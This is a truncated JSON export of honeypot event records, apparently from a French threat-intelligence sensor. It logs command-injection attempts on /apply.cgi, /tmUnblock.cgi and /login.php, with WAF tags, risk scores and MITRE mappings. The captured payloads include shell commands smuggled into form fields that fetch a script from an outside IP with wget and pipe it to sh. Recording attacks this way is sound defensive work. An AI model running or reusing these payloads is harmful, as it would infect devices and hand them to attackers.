\u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":511},{"id":11809344,"ip":"45.153.34.219","ts":"2026-07-14 02:18:11.000000","proto":"tcp","src_port":55104,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/tmUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00226cff281bfb0055f2e5c6afc1d923500419949544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 436, \u0022payload_entropy\u0022: 5.305456147592725, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022fdea675a9e9cfa4a884b573eb6859264ce6c6ab9\u0022, \u0022event_fingerprint\u0022: \u0022ce7c9e1da86e6b62212b8131b65e1bc88191d005\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022338cd69f8259a2c388cdaf6bc38864e2\u0022, \u0022path_pattern_hash\u0022: \u002240d64e5af66418a51c5ae33f5e8eb67d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.9\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.9\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00220fda06e478d8134a5ae08b94a59529128269ff8e\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 294\\r\\nConnect\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 72}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":436},{"id":10981926,"ip":"45.153.34.219","ts":"2026-07-11 05:55:06.000000","proto":"tcp","src_port":48834,"dst_port":8080,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/login.php","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a206e67696e782f312e32342e300d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 81, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022c9908f9a31aefa5902e21ee9fa132cbe056c536d\u0022, \u0022http_target_hash\u0022: \u00221e9c613aa9672f114224606bf48294d716b4e1be\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 327, \u0022payload_entropy\u0022: 5.200446567650025, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8080, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00225835293fdc6e596e89327afd0a6e3f8bd244face\u0022, \u0022event_fingerprint\u0022: \u0022e230612ef8bc6a8811dcafb7743607a27571f9da\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022d102c1d91e6e8dfce50172d4bf770de4\u0022, \u0022path_pattern_hash\u0022: \u0022c7581f0b69dd8802a97b9178d856a40a\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/login.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 187\\r\\nConnectio\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/login.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 187\\r\\nConnection: close\\r\\n\\r\\npassword=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s sound4;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/login.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 187\\r\\nConnectio\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/login.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/login.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/login.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 187\\r\\nConnection: close\\r\\n\\r\\npassword=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s sound4;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh \u0022, \u0022payload_snippet\u0022: \u0022POST \/login.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 187\\r\\nConnectio\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00220c985a53f277b80681ff035a41fb3bebec7ad552\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.php\u0022, \u0022request_line\u0022: \u0022POST \/login.php HTTP\/1.1\u0022, \u0022port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/login.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 187\\r\\nConnectio\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8080 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.php\u0022, \u0022target_port_label\u0022: \u00228080 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans 